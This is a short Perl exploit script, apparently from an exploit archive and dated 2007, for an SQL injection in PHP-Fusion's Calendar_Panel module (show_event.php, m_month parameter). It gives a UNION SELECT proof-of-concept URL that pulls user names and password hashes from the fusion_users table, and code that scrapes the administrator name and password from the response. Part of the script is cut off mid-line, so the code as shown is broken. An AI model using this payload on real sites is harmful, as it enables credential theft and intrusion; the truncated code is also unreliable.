|
#!/usr/bin/perl -w
# PHP-Fusion 'Calendar_Panel' Module show_event.PHP (m_month) SQL Injection Exploit And PoC
# Type :
# SQL Injection
# Release Date :
# {2007-03-31}
# Product :
# http://php-fusion.co.uk/
# Bug :
# http://localhost/script/modules/articles/print.php?id=x AND 1=1 or 1=0
# PoC :
# http://localhost/script/infusions/calendar_panel/show_event.php?m_month=-1/**/UNION/**/SELECT/**/0,1,user_password,user_name,4,5,6,7,8,9,10,11/**/FROM/**/fusion_users/*
use LWP::Simple;
if(!$ARGV[0] or !($ARGV[0]=~m/http/))
{
print "\n-----------------------------------\n";
print "PHP-Fusion 'Calendar_Panel' Module (m_month) SQL Injection Exploit\n";
print "-----------------------------------\n";
print "\nUniquE-Key{UniquE-Cracker}\n";
print "UniquE[at]UniquE-Key.ORG\n";
print "http://UniquE-Key.ORG\n";
print "\n-----------------------------------\n";
print "\nUsage: $0
(.*?)<\/td>/ && print "\n# Admin name : $1\n";
print "\n# Exploit Failed\n" if(!$1);
$xmie=~m/(.*?)<\/b><\/font><\/td>/ && print "\n# Password : $1\n";
# Author :
# UniquE-Key{UniquE-Cracker}
# UniquE(at)UniquE-Key.Org
# http://www.UniquE-Key.Org